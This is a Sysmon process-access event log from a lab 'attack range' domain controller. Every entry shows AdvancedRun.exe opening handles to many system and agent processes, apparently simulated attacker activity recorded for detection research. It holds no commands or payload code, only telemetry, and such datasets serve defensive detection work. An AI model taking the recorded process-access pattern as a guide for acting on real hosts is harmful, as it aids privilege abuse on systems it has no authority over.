10341000x80000000000000004063667Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.918{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.918{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2
10341000x80000000000000004063665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.918{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.917{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.917{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.916{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.915{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.915{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.915{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.915{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.915{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004063651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.914{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
